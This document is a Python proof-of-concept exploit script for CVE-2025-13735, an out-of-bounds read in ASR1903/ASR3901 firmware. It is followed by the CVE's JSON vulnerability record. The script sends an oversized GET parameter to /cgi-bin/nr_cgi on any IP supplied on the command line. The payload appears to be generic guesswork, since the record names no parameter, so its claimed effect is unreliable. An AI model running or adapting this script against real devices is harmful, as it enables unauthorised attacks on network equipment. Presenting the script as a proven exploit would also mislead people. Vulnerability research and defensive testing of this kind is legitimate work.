CVE-2025-13735

# CVE-2025-13735 PoC - ASR ASR1903/ASR3901 Out-of-bounds Read # Target: ASR1903/ASR3901 devices with nr_fw module # Note: This PoC is for educational and security testing purposes only import socket import struct import sys def create_exploit_payload(): """Generate malicious payload to trigger OOB read in NrCgi.C""" # HTTP GET request with oversized parameter # Target the NrCgi endpoint in nr_fw DLP module # Craft malicious HTTP request payload = b"GET /cgi-bin/nr_cgi?param=" # OOB read trigger: oversized parameter (2000+ bytes) oob_data = b"A" * 2000 # Add null byte to potentially trigger boundary condition payload += oob_data + b"\x00" payload += b" HTTP/1.1\r\n" payload += b"Host: target_device\r\n" payload += b"User-Agent: Mozilla/5.0\r\n" payload += b"Accept: */*\r\n" payload += b"Connection: close\r\n\r\n" return payload def exploit_target(target_ip, target_port=80): """Send exploit payload to target device""" try: print(f"[*] Target: {target_ip}:{target_port}") print(f"[*] Generating exploit payload...") payload = create_exploit_payload() print(f"[*] Payload length: {len(payload)} bytes") print(f"[*] Connecting to target...") sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((target_ip, target_port)) print(f"[*] Sending exploit payload...") sock.send(payload) print(f"[*] Receiving response...") try: response = sock.recv(4096) print(f"[*] Response received: {len(response)} bytes") print(f"[*] Response preview: {response[:200]}") except socket.timeout: print(f"[!] No response received (possible OOB read triggered)") sock.close() return True except Exception as e: print(f"[!] Error: {str(e)}") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python CVE-2025-13735_poc.py <target_ip> [port]") sys.exit(1) target_ip = sys.argv[1] target_port = int(sys.argv[2]) if len(sys.argv) > 2 else 80 print("=" * 60) print("CVE-2025-13735 PoC - ASR ASR1903/ASR3901 OOB Read") print("=" * 60) exploit_target(target_ip, target_port)

{"cve": {"id": "CVE-2025-13735", "sourceIdentifier": "68630edc-a58c-4cbd-9b01-0e130455c8ae", "published": "2025-11-26T07:16:00.173", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Out-of-bounds Read vulnerability in ASR1903、ASR3901 in ASR Lapwing_Linux on Linux (nr_fw modules). This vulnerability is associated with program files Code/nr_fw/DLP/src/NrCgi.C.\n\nThis issue affects Lapwing_Linux: before 2025/11/26."}, {"lang": "es", "value": "Vulnerabilidad de lectura fuera de límites en ASR1903 y ASR3901 en ASR Lapwing_Linux en Linux (módulos nr_fw). Esta vulnerabilidad está asociada con los archivos de programa Code/nr_fw/DLP/src/NrCgi.C. Este problema afecta a Lapwing_Linux: antes del 26/11/2025."}], "metrics": {"cvssMetricV31": [{"source": "68630edc-a58c-4cbd-9b01-0e130455c8ae", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 3.7}]}, "weaknesses": [{"source": "68630edc-a58c-4cbd-9b01-0e130455c8ae", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "references": [{"url": "https://www.asrmicro.com/en/goods/psirt?cid=41", "source": "68630edc-a58c-4cbd-9b01-0e130455c8ae"}]}}